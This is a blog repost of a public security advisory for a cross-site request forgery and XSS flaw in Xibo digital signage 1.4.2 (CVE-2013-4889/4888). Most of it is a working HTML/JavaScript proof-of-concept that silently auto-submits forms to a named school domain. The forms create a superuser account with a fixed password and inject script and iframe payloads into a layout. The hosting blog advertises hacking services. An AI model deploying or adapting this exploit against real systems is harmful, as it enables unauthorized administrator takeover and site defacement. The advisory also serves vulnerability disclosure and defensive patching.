Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863567913

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/62064/info

Xibo is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

Xibo 1.4.2 is vulnerable; other versions may also be affected. 

<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
    document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
    '<input type="hidden" name="userid" value="0">'+
    '<input type="hidden" name="username" value="Gimppy">'+
    '<input type="hidden" name="password" value="ISE">'+
    '<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
    '<input type="hidden" name="usertypeid" value="1">'+
    '<input type="hidden" name="groupid" value="1">'+
    '</form>');
}

//Set XSS Payloads
function RF2(){
    document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
    '<input type="hidden" name="layoutid" value="0">'+
    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror='alert(42)'>">'+
    '<input type="hidden" name="description" value="<iframe src='http://securityevaluators.com' width=100 height=1000</iframe>">'+
    '<input type="hidden" name="tags" value="">'+
    '<input type="hidden" name="templateid" value="0">'+
    '</form>');
}

function createPage(){
    RF1();
    RF2();
}

function _addAdmin(){
    document.addAdmin.submit();
}

function _addXSS(){
    document.addXSS.submit();
}

//Called Functions
createPage()
   
for (var i = 0; i < 2; i++){
    if(i == 0){
        window.setTimeout(_addAdmin, 0500);
    }
    else if(i == 1){
        window.setTimeout(_addXSS, 1000);
    }
    else{
        continue;
    }
}
</script>
</body>
</html>